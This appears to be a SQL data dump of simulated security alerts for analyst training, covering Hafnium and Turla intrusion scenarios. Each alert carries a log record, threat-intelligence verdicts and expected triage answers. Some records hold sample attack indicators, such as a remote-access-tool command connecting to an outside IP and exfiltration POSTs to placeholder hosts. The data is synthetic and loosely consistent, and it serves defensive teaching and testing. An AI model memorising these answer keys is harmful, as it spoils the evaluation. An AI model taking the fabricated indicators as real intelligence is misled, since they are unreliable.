(336, 'Custom Backdoor Installation', 'high', 'Endpoint Detection and Response (EDR)', 'An attacker has successfully installed a custom backdoor on macOS systems. This persistence mechanism allows continuous access and control over the infected systems of users who visited the compromised site.', 'Persistence', 'T1547: Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_type\":\"persistence\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"file_path\":\"/Users/jdoe/Library/LaunchAgents/com.example.backdoor.plist\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"launchd\",\"process_id\":1234,\"sha256_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"user_agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0\"}', '2026-01-02 20:31:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known macOS backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/Users/jdoe/Library/LaunchAgents/com.example.backdoor.plist\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File used to maintain persistence for a backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(337, 'Command and Control (C2) Communication Detected', 'high', 'Network Traffic Analysis', 'This alert highlights the establishment of communication between the backdoor and the attacker\'s C2 servers, enabling further actions.', 'Lateral Movement', 'T1071.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"185.92.220.133\",\"protocol\":\"HTTP\",\"method\":\"POST\",\"url\":\"http://malicious-domain.com/command\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"payload\":\"Encrypted data\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\"}', '2026-01-02 20:31:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.133\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server IP used for malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/command\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Domain associated with C2 communication.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash known for malware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username of the potentially compromised account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(338, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Systems', 'An unauthorized transfer of sensitive data was detected. The attacker attempted to exfiltrate proprietary data from the internal network to an external IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"event_id\":\"EXFIL-2023-10-15-142235\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"financial_report_Q3.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"blocked\",\"alert_trigger\":\"Data Exfiltration Policy\",\"bytes_transferred\":1048576,\"description\":\"Attempted transfer of classified financial document via HTTPS to untrusted external IP.\"}', '2026-01-02 20:31:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal corporate network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with exfiltration activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unrecognized file hash for sensitive document\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"HR System\",\"verdict\":\"internal\",\"details\":\"Employee account\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"financial_report_Q3.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Document Management System\",\"verdict\":\"sensitive\",\"details\":\"Confidential financial document\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(339, 'Initial Access via ProxyLogon Zero-Day', 'critical', 'Exchange server logs', 'Hafnium exploits the ProxyLogon zero-day vulnerabilities to breach the organization\'s perimeter defenses, marking the beginning of their operation.', 'Exploit', 'T1190 - Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T04:12:34Z\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"192.168.1.10\",\"username\":\"SYSTEM\",\"exploit\":\"ProxyLogon\",\"url\":\"/owa/auth/x.js\",\"user_agent\":\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"shell.aspx\"}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium IP associated with ProxyLogon exploits.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal Exchange server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_db\",\"verdict\":\"malicious\",\"details\":\"Hash associated with web shell used in ProxyLogon exploit.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"shell.aspx\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis_tool\",\"verdict\":\"malicious\",\"details\":\"Web shell file used for remote access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(340, 'Web Shell Deployment - China Chopper', 'high', 'Web server logs', 'Following initial access, Hafnium deploys the China Chopper web shell to maintain persistent access and command capabilities on the compromised server. The web shell allows remote control and execution of commands on the server.', 'Malware Installation', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T13:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.100\",\"http_method\":\"POST\",\"requested_url\":\"/uploads/chopper.jsp\",\"response_code\":200,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\",\"filename\":\"chopper.jsp\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"webadmin\"}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal web server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Known hash for China Chopper web shell\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"chopper.jsp\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Web shell filename used by attackers\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"webadmin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Username for web server administration\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(341, 'Credential Harvesting via Mimikatz', 'critical', 'Endpoint detection logs', 'With web shell access established, Hafnium utilizes Mimikatz to extract credentials, enabling further infiltration within the network. Endpoint detection identified the execution of the Mimikatz tool to dump credentials from LSASS.', 'Credential Access', 'T1003: Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"process_name\":\"mimikatz.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"detection_method\":\"behavioral\",\"alert_trigger\":\"Unauthorized credential dump detected\",\"host_ip\":\"192.168.1.25\",\"host_name\":\"workstation-01\"}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Credential dumping tool\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Match with known Mimikatz hash\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(342, 'Lateral Movement Through SMB', 'high', 'Network traffic analysis', 'Using harvested credentials, Hafnium moves laterally across the network by exploiting SMB protocol vulnerabilities, targeting additional critical systems.', 'Network Propagation', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.15.23\",\"protocol\":\"SMB\",\"action\":\"Access Granted\",\"username\":\"j.doe\",\"file_accessed\":\"\\\\\\\\192.168.15.23\\\\C$\\\\Windows\\\\system32\\\\cmd.exe\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"event_id\":4624,\"message\":\"An account was successfully logged on\",\"logon_type\":3}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium APT IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Inventory\",\"verdict\":\"internal\",\"details\":\"Corporate workstation\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with Hafnium\'s lateral movement tools\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Valid corporate user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(343, 'Execution of Reconnaissance Commands', 'high', 'Command-line audit logs', 'Hafnium executed a series of reconnaissance commands to map the network and locate key data repositories. This activity is indicative of an advanced attack with the objective of identifying sensitive data and valuable assets within the target organization.', 'Reconnaissance', 'T1016 - System Network Configuration Discovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:23:56Z\",\"event_id\":4624,\"command\":\"netstat -an; ipconfig /all; systeminfo\",\"user\":\"compromised_user\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"filename\":\"network_recon_tool.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Hafnium APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"network_recon_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"suspicious\",\"details\":\"Unusual tool executed on the endpoint by a compromised user.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious software used by Hafnium.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(344, 'Data Collection for Exfiltration', 'high', 'File access logs', 'An advanced threat actor, identified as Hafnium, has aggregated sensitive information. The data is being prepared for exfiltration. This activity was detected through abnormal file access patterns linked to known malicious IP addresses.', 'Data Collection', 'T1005: Data from Local System', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:23:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"username\":\"j.doe\",\"file_accessed\":\"/financial_reports/2023/Q3_financials.xlsx\",\"hash\":\"a1b2c3d4e5f67890123456789abcdef0\",\"action\":\"read\",\"status\":\"success\"}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known Hafnium IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual file access patterns detected.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"/financial_reports/2023/Q3_financials.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Monitoring System\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file accessed during off-hours by suspicious IP.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used by Hafnium.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(345, 'Data Exfiltration via HTTP POST', 'critical', 'Network traffic logs', 'Anomalous outbound traffic detected from an internal host to a known malicious IP, indicating possible data exfiltration via HTTP POST requests.', 'Data Exfiltration', 'T1041', 1, 'investigating', 34, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"http_method\":\"POST\",\"url\":\"http://malicious-cc-server.com/upload\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\",\"filename\":\"exfiltrated_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"john_doe\",\"response_code\":200}', '2026-01-03 00:04:00', '2026-01-11 01:45:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of possibly compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-cc-server.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"URL linked to data exfiltration activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"clean\",\"details\":\"File hash not previously associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account potentially used during exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(346, 'Cleanup and Removal of Indicators', 'high', 'System event logs', 'In an advanced attempt to evade detection, the threat actor Hafnium executed commands to remove event logs and other indicators of compromise from the system. This action is aimed at erasing traces of their presence and prolonging unauthorized access.', 'Defense Evasion', 'T1070.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":1102,\"log_name\":\"Security\",\"source\":\"Microsoft-Windows-Eventlog\",\"task_category\":\"Log Clear\",\"level\":\"Information\",\"user\":{\"id\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"name\":\"hacker_user\"},\"computer\":\"compromised-host.local\",\"description\":\"The audit log was cleared.\",\"ip_address\":\"192.168.1.45\",\"malicious_ip\":\"203.0.113.5\",\"deleted_files\":[\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"C:\\\\Temp\\\\malware.exe\"],\"hash\":\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\"}', '2026-01-03 00:04:00', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Hafnium infrastructure.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"59a5d6a3b1c7f5e4a5b1c6a7f5e4d3c2\",\"is_critical\":true,\"osint_result\":{\"source\":\"virustotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known Hafnium malware sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(347, 'Initial Access via Spear Phishing', 'high', 'Email Gateway Logs', 'A spear phishing email was detected targeting a diplomatic network. The email contained a malicious attachment believed to be linked with the Turla APT group. The email was sent from a known malicious IP address and contained a weaponized document aimed at exploiting vulnerabilities to gain an initial foothold.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:32:00Z\",\"email_id\":\"345abc678def901234ghi567\",\"sender\":\"malicious.actor@example.com\",\"recipient\":\"john.doe@diplomat.org\",\"subject\":\"Urgent: Diplomatic Meeting Itinerary\",\"attachment\":\"Meeting_Agenda.docx\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malware_family\":\"CobraDoc\",\"detection\":{\"rule_id\":\"PHISH-001\",\"rule_name\":\"Spear Phishing with Malicious Attachment\",\"confidence\":\"High\"}}', '2026-01-03 00:37:55', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"malicious.actor@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Known phishing email sender associated with APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address associated with Turla APT infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Turla weaponized document.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Meeting_Agenda.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Threat Intelligence\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in spear phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(348, 'Execution of Remote Access Tool', 'high', 'Endpoint Detection and Response', 'With initial access secured, Turla deploys a remote access tool to execute commands and further their control over the infected endpoint. Anomalous execution detected on endpoint with associated malicious artifacts.', 'Malware Execution', 'T1219 - Remote Access Tools', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"E12345\",\"event_type\":\"malware_execution\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"185.45.67.89\",\"username\":\"jdoe\",\"process_name\":\"rat_tool.exe\",\"process_hash\":\"3fa4c0f9d5d2f4e7a9b8c3e1c7a8f9b0\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\rat_tool.exe -connect 185.45.67.89\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\rat_tool.exe\",\"indicator\":\"Turla RAT\",\"device_id\":\"DESKTOP-ABCD1234\"}', '2026-01-03 00:37:55', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.45.67.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known Turla command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3fa4c0f9d5d2f4e7a9b8c3e1c7a8f9b0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Turla RAT\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"rat_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"malicious\",\"details\":\"Executable associated with Turla RAT\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Valid internal user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
